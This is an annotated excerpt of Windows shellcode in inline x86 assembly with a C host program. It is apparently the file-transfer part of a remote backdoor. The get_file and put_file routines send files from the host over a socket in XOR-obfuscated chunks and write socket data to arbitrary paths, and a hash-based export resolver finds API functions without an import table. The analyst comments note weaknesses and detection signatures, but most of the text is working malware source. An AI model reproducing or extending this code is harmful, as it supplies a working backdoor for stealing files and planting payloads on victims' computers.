  // get_file: send the file named in the received command back over the socket.
  // Reached by a jump from the command dispatcher, which is outside this excerpt.
  // In:  esi = base of the data area (every variable below is addressed as [esi+_name])
  //      eax = length of the received command text -- presumably set by the dispatcher;
  //            only its use at _sbuf+eax-1 is visible here
  //      [esi+_hsck] = connected socket (used with send below)
  // Out: jumps to k1 (outside this excerpt) when the transfer ends or CreateFileA fails.
  // Uses: eax, ecx, edx, flags, [esi+_hout0], [esi+_cnt], [esi+_pbuf]
  // Analyst note: the file leaves the host in 64-byte send() chunks XORed with the
  // one-byte Xor_key; that is obfuscation, not encryption -- a capture is recoverable
  // once the key byte is known.
  1. get_file:
  2. //int 3
  3. mov byte ptr [esi+_sbuf+eax-1], 0 ; NUL-terminate the command text (overwrites its last byte, presumably a trailing newline -- confirm in the dispatcher)
  4. lea edx, [esi+_sbuf+4] ; edx -> filename, i.e. the text after the 4-byte "get " prefix
  5. xor eax, eax
  6. push eax ; hTemplateFile = 0
  7. push eax ; dwFlagsAndAttributes = 0
  8. push 3 ; dwCreationDisposition = OPEN_EXISTING
  9. push eax ; lpSecurityAttributes = 0
  10. push eax ; dwShareMode = 0
  11. push 0x02000000 ; dwDesiredAccess = MAXIMUM_ALLOWED
  12. push edx ; lpFileName
  13. call dword ptr [esi+_CreateFileA] ; CreateFileA(filename, MAXIMUM_ALLOWED, 0, 0, OPEN_EXISTING, 0, 0)
  14. //---- check whether the file opened (INVALID_HANDLE_VALUE is -1) -------
  15. inc eax ; eax+1 == 0 exactly when the returned handle is -1
  16. test eax, eax
  17. jz k1 ; open failed: back to the dispatcher (k1 is outside this excerpt)
  18. dec eax ; restore the handle value
  19. //---------------------------------
  20. mov [esi+_hout0], eax ; _hout0 = file handle
  21. transfer:
  // Loop: read up to 64 bytes, XOR them in place, send them; the only exit is a 0 byte count.
  22. push 0 ; lpOverlapped = NULL
  23. lea edx, [esi+_cnt]
  24. push edx ; &_cnt receives the number of bytes actually read
  25. push 0x40 ; nNumberOfBytesToRead = 64 (one chunk)
  26. lea edx, [esi+_pbuf]
  27. push edx ; lpBuffer = _pbuf
  28. push [esi+_hout0]
  29. call dword ptr [esi+_ReadFile] ; ReadFile(_hout0, _pbuf, 64, &_cnt, 0); its BOOL result in eax is not examined
  30. mov ecx, [esi+_cnt]
  31. jecxz transfer_finish ; 0 bytes read: end of file (this jecxz is the loop's only exit)
  32. lea edx, [esi+_pbuf]
  33. call xor_data ; xor_data(_pbuf, ecx = _cnt); ecx >= 1 here because of the jecxz above
  34. push 0 ; flags = 0
  35. push [esi+_cnt] ; len = bytes read
  36. lea edx, [esi+_pbuf]
  37. push edx ; buf = _pbuf
  38. push [esi+_hsck]
  39. call dword ptr [esi+_send] ; send(_hsck, _pbuf, _cnt, 0); return value (bytes sent / SOCKET_ERROR) not examined
  40. jmp transfer
  41. transfer_finish:
  42. push [esi+_hout0]
  43. call dword ptr [esi+_CloseHandle] ; CloseHandle(_hout0)
  44. jmp k1 ; back to the dispatcher (outside this excerpt)
  // put_file: receive a file from the socket and write it to the named path.
  // Reached by a jump from the command dispatcher, which is outside this excerpt.
  // In:  esi = base of the data area; eax = length of the received command text
  //      (presumably set by the dispatcher); [esi+_hsck] = connected socket
  // Out: eax = 1, [esi+_sbuf] = '\n', then jumps to restore (outside this excerpt)
  // Wire format as visible here: 64-byte recv() chunks, each XORed in place with
  // Xor_key before WriteFile; a chunk whose first four bytes are "END!" ends the upload.
  45. put_file:
  46. //int 3
  47. mov byte ptr [esi+_sbuf+eax-1], 0 ; NUL-terminate the command text (overwrites its last byte, presumably a trailing newline -- confirm in the dispatcher)
  48. lea edx, [esi+_sbuf+4] ; edx -> filename, i.e. the text after the 4-byte "put " prefix
  49. xor eax, eax
  50. push eax ; hTemplateFile = 0
  51. push eax ; dwFlagsAndAttributes = 0
  52. push 2 ; dwCreationDisposition = CREATE_ALWAYS (an existing file is overwritten)
  53. push eax ; lpSecurityAttributes = 0
  54. push eax ; dwShareMode = 0
  55. push 0x02000000 ; dwDesiredAccess = MAXIMUM_ALLOWED
  56. push edx ; lpFileName
  57. call dword ptr [esi+_CreateFileA] ; CreateFileA(filename, MAXIMUM_ALLOWED, 0, 0, CREATE_ALWAYS, 0, 0)
  58. //---- check whether the file was created -------
  // NOTE: the INVALID_HANDLE_VALUE test that get_file performs is commented out here,
  // so on failure the -1 handle is stored and the upload loop runs anyway; each
  // WriteFile then fails, and the loop still ends only on the "END!" chunk.
  59. //inc eax
  60. //test eax, eax
  61. //jz k1
  62. //dec eax
  63. //--------------------------------
  64. mov [esi+_hout0], eax ; _hout0 = file handle (possibly -1, see above)
  65. upload:
  66. push 0 ; flags = 0
  67. push 0x40 ; len = 64 (one chunk)
  68. lea edx, [esi+_pbuf]
  69. push edx ; buf = _pbuf
  70. push [esi+_hsck]
  71. call dword ptr [esi+_recv] // recv(_hsck, _pbuf, 64, 0); eax = bytes received; a 0 (peer closed) or SOCKET_ERROR (-1) result is not checked and does not leave the loop
  72. //-----------------------------
  73. cmp dword ptr [esi+_pbuf], 21444E45h // terminator check: 21444E45h is "END!" in little-endian byte order (45h 4Eh 44h 21h)
  74. jz upload_finish
  75. //-----------------------------
  76. lea edx, [esi+_pbuf]
  77. push eax
  78. pop ecx ; ecx = eax: recv's return value is passed on as the length without validation
  79. call xor_data // xor_data(_pbuf, len); xor_data leaves eax untouched
  80. push 0 ; lpOverlapped = NULL
  81. lea edx, [esi+_cnt]
  82. push edx ; &_cnt receives the number of bytes written
  83. push eax ; nNumberOfBytesToWrite = len (still recv's return value)
  84. lea edx, [esi+_pbuf]
  85. push edx ; lpBuffer = _pbuf
  86. push [esi+_hout0]
  87. call dword ptr [esi+_WriteFile] // WriteFile(_hout0, _pbuf, len, &_cnt, 0); its result is not examined
  88. //push 0
  89. //push esp
  90. //push 4004667Fh
  91. //push [esi+_hsck]
  92. //call dword ptr [esi+_ioctlsocket] // ioctlsocket(_hsck, FIONREAD, &i); i = 0
  93. //pop ecx
  94. //jecxz upload_finish
  // (disabled alternative end-of-stream test, FIONREAD == 0 -> done; superseded by the "END!" marker above)
  95. jmp upload
  96. upload_finish:
  97. //int 3
  98. push [esi+_hout0]
  99. call dword ptr [esi+_CloseHandle] // CloseHandle(_hout0);
  100. mov byte ptr [esi+_sbuf], 0x0a ; _sbuf[0] = '\n' -- what the code at restore does with it is outside this excerpt
  101. push 1
  102. pop eax ; eax = 1 (push/pop form of loading a small constant)
  103. jmp restore ; restore is outside this excerpt
  // xor_data: XOR a buffer in place with the one-byte constant Xor_key.
  //   Xor_key is defined outside this excerpt; the byte ptr operand fixes the operation width.
  // In:  edx = buffer, ecx = length in bytes; requires ecx >= 1
  // Out: buffer modified in place; eax is not touched (put_file relies on that)
  // Clobbers: edx (left at buffer-1), ecx (left at 0), flags
  // Walks from the last byte down to the first: after dec edx, [edx+ecx] is buffer[ecx-1].
  // With ecx == 0 the first xor hits the byte before the buffer and `loop` then wraps
  // ecx to 0FFFFFFFFh, so it keeps going for ~4 GB -- callers must guarantee ecx >= 1.
  104. xor_data:
  105. dec edx ; edx = buffer - 1 so that [edx+ecx] indexes buffer[ecx-1]
  106. xor_work:
  107. xor byte ptr [edx+ecx], Xor_key
  108. loop xor_work ; ecx--; continue while ecx != 0
  109. ret
  // find_hashfunc_addr: resolve one exported function by a 32-bit hash of its name,
  // by walking the module's export name table (the classic technique used by
  // position-independent Windows shellcode instead of an import table).
  // In:  ebp = base address of the loaded module (e_lfanew is read at [ebp+3Ch])
  //      edi -> the 32-bit hash to look up
  // Out: the resolved function address is stored at [edi] and edi advances by 4 (stosd)
  // Preserved: esi, ecx (push/pop).  Clobbers: eax, ebx, edx, flags.  Assumes DF = 0 (lodsd/stosd).
  // Name hash: h = 0; for each byte c up to the NUL: h = ror32(h, 7) + c, c sign-extended.
  // Analyst note: the ror-7/add pair and this walk order are a stable signature for detection.
  // Limit: there is no bound against NumberOfNames -- a hash that matches no export
  //   keeps reading past the end of the name table.
  110. find_hashfunc_addr:
  111. push ecx
  112. push esi
  113. mov esi, [ebp+3Ch] ; e_lfanew: offset of the PE header
  114. mov esi, [esi+ebp+78h] ; ExportDirectory RVA
  115. add esi, ebp ; rva2va
  116. push esi ; keep the export directory VA for the ordinal/function lookup below
  117. mov esi, [esi+20h] ; AddressOfNames RVA
  118. add esi, ebp ; rva2va: esi now walks the array of name RVAs
  119. xor ecx, ecx
  120. dec ecx ; ecx = -1 so the inc at find_start yields index 0
  121. find_start:
  122. inc ecx ; ecx = index of the name being hashed
  123. lodsd ; eax = next name RVA; esi += 4
  124. add eax, ebp ; eax -> ASCIIZ export name
  125. xor ebx, ebx ; ebx = running hash
  126. hash_loop:
  127. movsx edx, byte ptr [eax] ; dl = char; dh = 00h for a non-negative byte, 0FFh for a negative one
  128. cmp dl, dh ; true at the NUL terminator (dl = dh = 0); also true for the byte 0FFh
  129. jz short find_addr
  130. ror ebx, 7 ; hash step: ebx = ror(ebx, 7) + char
  131. add ebx, edx
  132. inc eax
  133. jmp short hash_loop
  134. find_addr:
  135. cmp ebx, [edi] ; compare to the wanted hash
  136. jnz short find_start ; no match: next name (no NumberOfNames bound, see header)
  137. pop esi ; ExportDirectory VA
  138. mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA
  139. add ebx, ebp ; rva2va
  140. mov cx, [ebx+ecx*2] ; FunctionOrdinal (16-bit load; relies on the upper half of ecx being 0, i.e. index < 65536)
  141. mov ebx, [esi+1Ch] ; AddressOfFunctions RVA
  142. add ebx, ebp ; rva2va
  143. mov eax, [ebx+ecx*4] ; FunctionAddress RVA
  144. add eax, ebp ; rva2va
  145. stosd ; store the function address at [edi]; edi += 4
  146. pop esi
  147. pop ecx
  148. retn
  // locate_addr: `call func_start` pushes the address of the byte that follows it and
  // transfers to func_start, which is outside this excerpt -- presumably the usual way
  // position-independent code obtains its own load address; confirm in func_start.
  149. locate_addr:
  150. call func_start
  151. PROC_END //C macro to end proc
  152. }
  153. }
  154. int main(int argc, char *argv[])
  155. {
  // Host program entry: emits the assembled shellcode bytes. GetShellCode() and
  // PrintSc() are defined outside this excerpt; sh_Buff/sh_Len presumably are the
  // buffer and length that GetShellCode() fills in -- confirm against their definitions.
  // argc/argv are unused.
  156. unsigned char Buff[2048];  // unused: the PrintSc(Buff, ...) call below is commented out
  157. GetShellCode();
  158. PrintSc(sh_Buff, sh_Len);
  159. //PrintSc(Buff, sizeof(Buff));
  160. return 1;  // NOTE: non-zero exit status even on the normal path
  161. }
